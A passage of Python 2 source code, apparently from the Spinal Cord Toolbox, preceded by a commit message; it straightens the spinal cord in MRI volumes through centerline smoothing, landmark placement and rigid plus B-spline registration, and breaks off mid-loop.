param_split = param.split('=')
if param_split[0] == 'algo_fitting':
sc_straight.algo_fitting = param_split[1]
elif param_split[0] == 'bspline_meshsize':
sc_straight.bspline_meshsize = param_split[1]
elif param_split[0] == 'bspline_numberOfLevels':
sc_straight.bspline_numberOfLevels = param_split[1]
elif param_split[0] == 'bspline_order':
sc_straight.bspline_order = param_split[1]
elif param_split[0] == 'algo_landmark_rigid':
sc_straight.algo_landmark_rigid = param_split[1]
elif param_split[0] == 'all_labels':
sc_straight.all_labels = int(param_split[1])
elif param_split[0] == 'use_continuous_labels':
sc_straight.use_continuous_labels = int(param_split[1])
elif param_split[0] == 'gapz':
sc_straight.gapz = int(param_split[1])
sc_straight.straighten()
REF: temporarily setting continuous labels option because it is not compile on linux. See issue #415
Former-commit-id: 61802b1437e3cf33eb57eb69a9c8ba970edeffb5 [formerly 46be0ea17c75ecbe99517b401295b5301048e7bf]
Former-commit-id: acb38691f0f14f832aa987032489f3e2a021d104
Former-commit-id: 5f68bdfb93d7885bb80957401fc937b5fdc23fff
#!/usr/bin/env python
#
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-09-01
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
from msct_parser import Parser
from sct_label_utils import ProcessLabels
from sct_crop_image import ImageCropper
from nibabel import load, Nifti1Image, save
from numpy import array, asarray, append, insert, linalg, mean, sum, isnan
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
from sct_apply_transfo import Transform
import sct_utils as sct
from msct_smooth import smoothing_window, evaluate_derivative_3D
from sct_orientation import set_orientation
from msct_types import Coordinate
import copy_reg
import types
def _pickle_method(method):
"""
Author: Steven Bethard (author of argparse)
http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
"""
func_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
cls_name = ''
if func_name.startswith('__') and not func_name.endswith('__'):
cls_name = cls.__name__.lstrip('_')
if cls_name:
func_name = '_' + cls_name + func_name
return _unpickle_method, (func_name, obj, cls)
def _unpickle_method(func_name, obj, cls):
"""
Author: Steven Bethard
http://bytes.com/topic/python/answers/552476-why-cant-you-pickle-instancemethods
"""
for cls in cls.mro():
try:
func = cls.__dict__[func_name]
except KeyError:
pass
else:
break
return func.__get__(obj, cls)
copy_reg.pickle(types.MethodType, _pickle_method, _unpickle_method)
def smooth_centerline(fname_centerline, algo_fitting='hanning', type_window='hanning', window_length=80, verbose=0):
"""
:param fname_centerline: centerline in RPI orientation
:return: a bunch of useful stuff
"""
# window_length = param.window_length
# type_window = param.type_window
# algo_fitting = param.algo_fitting
sct.printv('\nSmooth centerline/segmentation...', verbose)
# get dimensions (again!)
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline)
# open centerline
file = load(fname_centerline)
data = file.get_data()
# loop across z and associate x,y coordinate with the point having maximum intensity
# N.B. len(z_centerline) = nz_nonz can be smaller than nz in case the centerline is smaller than the input volume
z_centerline = [iz for iz in range(0, nz, 1) if data[:, :, iz].any()]
nz_nonz = len(z_centerline)
x_centerline = [0 for iz in range(0, nz_nonz, 1)]
y_centerline = [0 for iz in range(0, nz_nonz, 1)]
x_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
y_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
z_centerline_deriv = [0 for iz in range(0, nz_nonz, 1)]
# get center of mass of the centerline/segmentation
sct.printv('.. Get center of mass of the centerline/segmentation...', verbose)
for iz in range(0, nz_nonz, 1):
x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(array(data[:, :, z_centerline[iz]]))
# import matplotlib.pyplot as plt
# fig = plt.figure()
# ax = fig.add_subplot(111)
# data_tmp = data
# data_tmp[x_centerline[iz], y_centerline[iz], z_centerline[iz]] = 10
# implot = ax.imshow(data_tmp[:, :, z_centerline[iz]].T)
# implot.set_cmap('gray')
# plt.show()
sct.printv('.. Smoothing algo = '+algo_fitting, verbose)
if algo_fitting == 'hanning':
# 2D smoothing
sct.printv('.. Windows length = '+str(window_length), verbose)
# change to array
x_centerline = asarray(x_centerline)
y_centerline = asarray(y_centerline)
# Smooth the curve
x_centerline_smooth = smoothing_window(x_centerline, window_len=window_length/pz, window=type_window, verbose = verbose)
y_centerline_smooth = smoothing_window(y_centerline, window_len=window_length/pz, window=type_window, verbose = verbose)
# convert to list final result
x_centerline_smooth = x_centerline_smooth.tolist()
y_centerline_smooth = y_centerline_smooth.tolist()
# clear variable
del data
x_centerline_fit = x_centerline_smooth
y_centerline_fit = y_centerline_smooth
z_centerline_fit = z_centerline
# get derivative
x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = evaluate_derivative_3D(x_centerline_fit, y_centerline_fit, z_centerline, px, py, pz)
x_centerline_fit = asarray(x_centerline_fit)
y_centerline_fit = asarray(y_centerline_fit)
z_centerline_fit = asarray(z_centerline_fit)
elif algo_fitting == 'nurbs':
from msct_smooth import b_spline_nurbs
x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_nurbs(x_centerline, y_centerline, z_centerline, nbControl=None, verbose=verbose)
else:
sct.printv('ERROR: wrong algorithm for fitting',1,'error')
return x_centerline_fit, y_centerline_fit, z_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
class SpinalCordStraightener(object):
def __init__(self, input_filename, centerline_filename, debug=0, deg_poly=10, gapxy=20, gapz=15, padding=30, interpolation_warp='spline', rm_tmp_files=1, verbose=1, algo_fitting='hanning', type_window='hanning', window_length=50, crop=1, output_filename=''):
self.input_filename = input_filename
self.centerline_filename = centerline_filename
self.output_filename = output_filename
self.debug = debug
self.deg_poly = deg_poly # maximum degree of polynomial function for fitting centerline.
self.gapxy = gapxy # size of cross in x and y direction for the landmarks
self.gapz = gapz # gap between landmarks along z voxels
self.padding = padding # pad input volume in order to deal with the fact that some landmarks might be outside the FOV due to the curvature of the spinal cord
self.interpolation_warp = interpolation_warp
self.remove_temp_files = rm_tmp_files # remove temporary files
self.verbose = verbose
self.algo_fitting = algo_fitting # 'hanning' or 'nurbs'
self.type_window = type_window # !! for more choices, edit msct_smooth. Possibilities: 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'
self.window_length = window_length
self.crop = crop
self.cpu_number = None
self.bspline_meshsize = '5x5x10'
self.bspline_numberOfLevels = '3'
self.bspline_order = '2'
self.algo_landmark_rigid = 'translation-xy'
self.all_labels = 1
self.use_continuous_labels = 0
self.mse_straightening = 0.0
self.max_distance_straightening = 0.0
def worker_landmarks_curved(self, arguments):
try:
iz = arguments[0]
iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline = arguments[1]
temp_results = []
if iz in iz_curved:
# calculate d (ax+by+cz+d=0)
a = x_centerline_deriv[iz]
b = y_centerline_deriv[iz]
c = z_centerline_deriv[iz]
x = x_centerline_fit[iz]
y = y_centerline_fit[iz]
z = z_centerline[iz]
d = -(a * x + b * y + c * z)
# print a,b,c,d,x,y,z
# set coordinates for landmark at the center of the cross
coord = Coordinate([0, 0, 0, 0])
coord.x, coord.y, coord.z = x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz]
temp_results.append(coord)
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
cross_coordinates = [Coordinate(), Coordinate(), Coordinate(), Coordinate()]
cross_coordinates[0].y = y_centerline_fit[iz]
cross_coordinates[1].y = y_centerline_fit[iz]
# set x and z coordinates for landmarks +x and -x, forcing de landmark to be in the orthogonal plan and the distance landmark/curve to be gapxy
x_n = Symbol('x_n')
cross_coordinates[1].x, cross_coordinates[0].x = solve(
(x_n - x) ** 2 + ((-1 / c) * (a * x_n + b * y + d) - z) ** 2 - self.gapxy ** 2, x_n) # x for -x and +x
cross_coordinates[0].z = (-1 / c) * (a * cross_coordinates[0].x + b * y + d) # z for +x
cross_coordinates[1].z = (-1 / c) * (a * cross_coordinates[1].x + b * y + d) # z for -x
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
cross_coordinates[2].x = x_centerline_fit[iz]
cross_coordinates[3].x = x_centerline_fit[iz]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
y_n = Symbol('y_n')
cross_coordinates[3].y, cross_coordinates[2].y = solve(
(y_n - y) ** 2 + ((-1 / c) * (a * x + b * y_n + d) - z) ** 2 - self.gapxy ** 2, y_n) # y for -y and +y
cross_coordinates[2].z = (-1 / c) * (a * x + b * cross_coordinates[2].y + d) # z for +y
cross_coordinates[3].z = (-1 / c) * (a * x + b * cross_coordinates[3].y + d) # z for -y
for coord in cross_coordinates:
temp_results.append(coord)
else:
if self.all_labels >= 1:
temp_results.append(
Coordinate([x_centerline_fit[iz], y_centerline_fit[iz], z_centerline[iz], 0], mode='continuous'))
return iz, temp_results
except KeyboardInterrupt:
return
def worker_landmarks_curved_results(self, results):
sorted(results, key=lambda l: l[0])
self.results_landmarks_curved = []
landmark_curved_value = 0
for iz, l_curved in results:
for landmark in l_curved:
landmark.value = landmark_curved_value
self.results_landmarks_curved.append(landmark)
landmark_curved_value += 1
def straighten(self):
# Initialization
fname_anat = self.input_filename
fname_centerline = self.centerline_filename
fname_output = self.output_filename
gapxy = self.gapxy
gapz = self.gapz
padding = self.padding
remove_temp_files = self.remove_temp_files
verbose = self.verbose
interpolation_warp = self.interpolation_warp
algo_fitting = self.algo_fitting
window_length = self.window_length
type_window = self.type_window
crop = self.crop
# start timer
start_time = time.time()
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
sct.printv(path_sct, verbose)
if self.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
fname_anat = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/anat_rpi.nii' #path_sct+'/testing/sct_testing_data/data/t2/t2.nii.gz'
fname_centerline = '/Users/julien/data/temp/sct_example_data/t2/tmp.150401221259/centerline_rpi.nii' # path_sct+'/testing/sct_testing_data/data/t2/t2_seg.nii.gz'
remove_temp_files = 0
type_window = 'hanning'
verbose = 2
# check existence of input files
sct.check_file_exist(fname_anat, verbose)
sct.check_file_exist(fname_centerline, verbose)
# Display arguments
sct.printv('\nCheck input arguments...', verbose)
sct.printv(' Input volume ...................... '+fname_anat, verbose)
sct.printv(' Centerline ........................ '+fname_centerline, verbose)
sct.printv(' Final interpolation ............... '+interpolation_warp, verbose)
sct.printv(' Verbose ........................... '+str(verbose), verbose)
sct.printv('', verbose)
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp, verbose)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp, verbose)
sct.run('cp '+fname_centerline+' '+path_tmp, verbose)
# go to tmp folder
os.chdir(path_tmp)
try:
# Change orientation of the input centerline into RPI
sct.printv('\nOrient centerline to RPI orientation...', verbose)
fname_centerline_orient = file_centerline+'_rpi.nii.gz'
set_orientation(file_centerline+ext_centerline, 'RPI', fname_centerline_orient)
# Get dimension
sct.printv('\nGet dimensions...', verbose)
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
sct.printv('.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz), verbose)
sct.printv('.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm', verbose)
# smooth centerline
x_centerline_fit, y_centerline_fit, z_centerline, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = smooth_centerline(fname_centerline_orient, algo_fitting=algo_fitting, type_window=type_window, window_length=window_length,verbose=verbose)
# Get coordinates of landmarks along curved centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along curved centerline...', verbose)
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy. In voxel space!!!
# find z indices along centerline given a specific gap: iz_curved
nz_nonz = len(z_centerline)
nb_landmark = int(round(float(nz_nonz)/gapz))
if nb_landmark == 0:
nb_landmark = 1
if nb_landmark == 1:
iz_curved = [0]
else:
iz_curved = [i*gapz for i in range(0, nb_landmark - 1)]
iz_curved.append(nz_nonz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
# landmark_curved initialisation
# landmark_curved = [ [ [ 0 for i in range(0, 3)] for i in range(0, 5) ] for i in iz_curved ]
landmark_curved = []
### TODO: THIS PART IS SLOW AND CAN BE MADE FASTER
### >>=====================================================================================================
worker_arguments = (iz_curved, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv, x_centerline_fit, y_centerline_fit, z_centerline)
if self.cpu_number != 0:
from multiprocessing import Pool
arguments_landmarks = [(iz, worker_arguments) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
pool = Pool(processes=self.cpu_number)
pool.map_async(self.worker_landmarks_curved, arguments_landmarks, callback=self.worker_landmarks_curved_results)
pool.close()
try:
pool.join() # waiting for all the jobs to be done
if self.results_landmarks_curved:
landmark_curved = self.results_landmarks_curved
else:
raise ValueError('ERROR: no curved landmarks constructed...')
except KeyboardInterrupt:
print "\nWarning: Caught KeyboardInterrupt, terminating workers"
pool.terminate()
sys.exit(2)
except Exception as e:
print 'Error during straightening on line {}'.format(sys.exc_info()[-1].tb_lineno)
print e
sys.exit(2)
else:
landmark_curved_temp = [self.worker_landmarks_curved((iz, worker_arguments)) for iz in range(min(iz_curved), max(iz_curved) + 1, 1)]
landmark_curved_value = 0
for iz, l_curved in landmark_curved_temp:
for landmark in l_curved:
landmark.value = landmark_curved_value
landmark_curved.append(landmark)
landmark_curved_value += 1
# Get coordinates of landmarks along straight centerline
#==========================================================================================
sct.printv('\nGet coordinates of landmarks along straight centerline...', verbose)
# landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
landmark_straight = []
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
# TODO: DO NOT APPROXIMATE CURVE --> LINE
if nb_landmark == 1:
iz_straight = [0 for i in range(0, nb_landmark+1)]
else:
iz_straight = [0 for i in range(0, nb_landmark)]
# print iz_straight,len(iz_straight)
iz_straight[0] = iz_curved[0]
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
z_centerline[iz_curved[index]] - z_centerline[iz_curved[index-1]] ]
# compute norm of this vector
norm_vector_centerline = linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline, 0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
landmark_curved_value = 1
for iz in range(min(iz_curved), max(iz_curved)+1, 1):
if iz in iz_curved:
index = iz_curved.index(iz)
# set coordinates for landmark at the center of the cross
landmark_straight.append(Coordinate([x0, y0, iz_straight[index], landmark_curved_value]))
# set x, y and z coordinates for landmarks +x
landmark_straight.append(Coordinate([x0 + gapxy, y0, iz_straight[index], landmark_curved_value+1]))
# set x, y and z coordinates for landmarks -x
landmark_straight.append(Coordinate([x0 - gapxy, y0, iz_straight[index], landmark_curved_value+2]))
# set x, y and z coordinates for landmarks +y
landmark_straight.append(Coordinate([x0, y0 + gapxy, iz_straight[index], landmark_curved_value+3]))
# set x, y and z coordinates for landmarks -y
landmark_straight.append(Coordinate([x0, y0 - gapxy, iz_straight[index], landmark_curved_value+4]))
landmark_curved_value += 5
else:
if self.all_labels >= 1:
landmark_straight.append(Coordinate([x0, y0, iz, landmark_curved_value]))
landmark_curved_value += 1
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
#sct.run('fslview ' + fname_centerline_orient)
sct.printv('\nPad input volume to account for landmarks that fall outside the FOV...', verbose)
sct.run('isct_c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz', verbose)
# Open padded centerline for reading
sct.printv('\nOpen padded centerline for reading...', verbose)
file = load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
landmark_curved_rigid = []
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
# Reorganize landmarks
points_fixed, points_moving = [], []
for coord in landmark_straight:
points_fixed.append([coord.x, coord.y, coord.z])
for coord in landmark_curved:
points_moving.append([coord.x, coord.y, coord.z])
# Register curved landmarks on straight landmarks based on python implementation
sct.printv('\nComputing rigid transformation (algo='+self.algo_landmark_rigid+') ...', verbose)
import msct_register_landmarks
(rotation_matrix, translation_array, points_moving_reg) = msct_register_landmarks.getRigidTransformFromLandmarks(
points_fixed, points_moving, constraints=self.algo_landmark_rigid, show=False)
# reorganize registered pointsx
for index_curved, ind in enumerate(range(0, len(points_moving_reg), 1)):
coord = Coordinate()
coord.x, coord.y, coord.z, coord.value = points_moving_reg[ind][0], points_moving_reg[ind][1], points_moving_reg[ind][2], index_curved+1
landmark_curved_rigid.append(coord)
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_curved_rigid_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved_rigid)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved_rigid[index].x)), \
int(round(landmark_curved_rigid[index].y)), \
int(round(landmark_curved_rigid[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_rigid_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved_rigid[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_rigid_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved_rigid.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved_rigid.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# writing rigid transformation file
text_file = open("tmp.curve2straight_rigid.txt", "w")
text_file.write("#Insight Transform File V1.0\n")
text_file.write("#Transform 0\n")
text_file.write("Transform: AffineTransform_double_3_3\n")
text_file.write("Parameters: %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f %.9f\n" % (
rotation_matrix[0, 0], rotation_matrix[0, 1], rotation_matrix[0, 2], rotation_matrix[1, 0],
rotation_matrix[1, 1], rotation_matrix[1, 2], rotation_matrix[2, 0], rotation_matrix[2, 1],
rotation_matrix[2, 2], -translation_array[0, 0], translation_array[0, 1],
-translation_array[0, 2]))
text_file.write("FixedParameters: 0 0 0\n")
text_file.close()
else:
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# Loop across cross index
for index in range(0, len(landmark_curved)):
x, y, z = int(round(landmark_curved[index].x)), \
int(round(landmark_curved[index].y)), \
int(round(landmark_curved[index].z))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_curved[index].value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index].x)), \
int(round(landmark_straight[index].y)), \
int(round(landmark_straight[index].z))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x + padding - 1:x + padding + 2, y + padding - 1:y + padding + 2,
z + padding - 1:z + padding + 2] = landmark_straight[index].value
# Write NIFTI volumes
sct.printv('\nWrite NIFTI volumes...', verbose)
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
img = Nifti1Image(data_curved_landmarks, None, hdr)
save(img, 'tmp.landmarks_curved.nii.gz')
sct.printv('.. File created: tmp.landmarks_curved.nii.gz', verbose)
img = Nifti1Image(data_straight_landmarks, None, hdr)
save(img, 'tmp.landmarks_straight.nii.gz')
sct.printv('.. File created: tmp.landmarks_straight.nii.gz', verbose)
# Estimate deformation field by pairing landmarks
#==========================================================================================
# convert landmarks to INT
sct.printv('\nConvert landmarks to INT...', verbose)
sct.run('isct_c3d tmp.landmarks_straight.nii.gz -type int -o tmp.landmarks_straight.nii.gz', verbose)
sct.run('isct_c3d tmp.landmarks_curved.nii.gz -type int -o tmp.landmarks_curved.nii.gz', verbose)
# This stands to avoid overlapping between landmarks
# TODO: do symmetric removal
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 1...', verbose)
label_process_straight = ProcessLabels(fname_label="tmp.landmarks_straight.nii.gz",
fname_output=["tmp.landmarks_straight.nii.gz", "tmp.landmarks_curved.nii.gz"],
fname_ref="tmp.landmarks_curved.nii.gz", verbose=verbose)
label_process_straight.process('remove-symm')
# Estimate rigid transformation
sct.printv('\nEstimate rigid transformation between paired landmarks...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt', verbose)
# Apply rigid transformation
sct.printv('\nApply rigid transformation to curved landmarks...', verbose)
#sct.run('sct_apply_transfo -i tmp.landmarks_curved.nii.gz -o tmp.landmarks_curved_rigid.nii.gz -d tmp.landmarks_straight.nii.gz -w tmp.curve2straight_rigid.txt -x nn', verbose)
Transform(input_filename="tmp.landmarks_curved.nii.gz", source_reg="tmp.landmarks_curved_rigid.nii.gz", output_filename="tmp.landmarks_straight.nii.gz", warp="tmp.curve2straight_rigid.txt", interp="nn", verbose=verbose).apply()
if verbose == 2:
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
fig = plt.figure()
ax = Axes3D(fig)
ax.plot(x_centerline_fit, y_centerline_fit, z_centerline, zdir='z')
ax.plot([coord.x for coord in landmark_curved],
[coord.y for coord in landmark_curved],
[coord.z for coord in landmark_curved], '.')
ax.plot([coord.x for coord in landmark_straight],
[coord.y for coord in landmark_straight],
[coord.z for coord in landmark_straight], 'r.')
if self.algo_landmark_rigid is not None and self.algo_landmark_rigid != 'None':
ax.plot([coord.x for coord in landmark_curved_rigid],
[coord.y for coord in landmark_curved_rigid],
[coord.z for coord in landmark_curved_rigid], 'b.')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
if (self.use_continuous_labels == 1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
landmark_curved_rigid, landmark_straight = ProcessLabels.remove_label_coord(landmark_curved_rigid, landmark_straight, symmetry=True)
# Writting landmark curve in text file
landmark_straight_file = open("LandmarksRealStraight.txt", "w+")
for i in landmark_straight:
landmark_straight_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_straight_file.close()
# Writting landmark curve in text file
landmark_curved_file = open("LandmarksRealCurve.txt", "w+")
for i in landmark_curved_rigid:
landmark_curved_file.write(
str(i.x + padding) + "," + str(i.y + padding) + "," + str(i.z + padding) + "\n")
landmark_curved_file.close()
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
# This stands to avoid overlapping between landmarks
sct.printv('\nMake sure all labels between landmark_straight and landmark_curved match 2...', verbose)
label_process = ProcessLabels(fname_label="tmp.landmarks_curved_rigid.nii.gz",
fname_output=["tmp.landmarks_curved_rigid.nii.gz", "tmp.landmarks_straight.nii.gz"],
fname_ref="tmp.landmarks_straight.nii.gz", verbose=verbose)
label_process.process('remove-symm')
# Estimate b-spline transformation curve --> straight
sct.printv('\nEstimate b-spline transformation: curve --> straight...', verbose)
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# remove padding for straight labels
if crop == 1:
ImageCropper(input_file="tmp.landmarks_straight.nii.gz", output_file="tmp.landmarks_straight_crop.nii.gz", dim="0,1,2", bmax=True, verbose=verbose).crop()
pass
else:
sct.run('cp tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
#sct.run('isct_ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# !!! DO NOT USE sct.run HERE BECAUSE isct_ComposeMultiTransform OUTPUTS A NON-NULL STATUS !!!
cmd = 'isct_ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight_crop.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
sct.printv(cmd, verbose, 'code')
sct.run(cmd, self.verbose)
#commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
sct.printv('\nEstimate b-spline transformation: straight --> curve...', verbose)
if (self.use_continuous_labels==1 and self.algo_landmark_rigid is not None and self.algo_landmark_rigid != "None") or self.use_continuous_labels=='1':
sct.run('isct_ANTSUseLandmarkImagesWithTextFileToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' LandmarksRealCurve.txt LandmarksRealStraight.txt '+self.bspline_order+' 0', verbose)
else:
sct.run('isct_ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz '+self.bspline_meshsize+' '+self.bspline_numberOfLevels+' '+self.bspline_order+' 0', verbose)
# Concatenate rigid and non-linear transformations...
sct.printv('\nConcatenate rigid and non-linear transformations...', verbose)
cmd = 'isct_ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R '+file_anat+ext_anat+' -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
sct.printv(cmd, verbose, 'code')
#commands.getstatusoutput(cmd)
sct.run(cmd, self.verbose)
# Apply transformation to input image
sct.printv('\nApply transformation to input image...', verbose)
Transform(input_filename=str(file_anat+ext_anat), source_reg="tmp.anat_rigid_warp.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp=interpolation_warp, warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
# compute the error between the straightened centerline/segmentation and the central vertical line.
# Ideally, the error should be zero.
# Apply deformation to input image
sct.printv('\nApply transformation to centerline image...', verbose)
# sct.run('sct_apply_transfo -i '+fname_centerline_orient+' -o tmp.centerline_straight.nii.gz -d tmp.landmarks_straight_crop.nii.gz -x nn -w tmp.curve2straight.nii.gz')
Transform(input_filename=fname_centerline_orient, source_reg="tmp.centerline_straight.nii.gz", output_filename="tmp.landmarks_straight_crop.nii.gz", interp="nn", warp="tmp.curve2straight.nii.gz", verbose=verbose).apply()
#c = sct.run('sct_crop_image -i tmp.centerline_straight.nii.gz -o tmp.centerline_straight_crop.nii.gz -dim 2 -bzmax')
from msct_image import Image
file_centerline_straight = Image('tmp.centerline_straight.nii.gz', verbose=verbose)
coordinates_centerline = file_centerline_straight.getNonZeroCoordinates(sorting='z')
mean_coord = []
from numpy import mean
for z in range(coordinates_centerline[0].z, coordinates_centerline[-1].z):
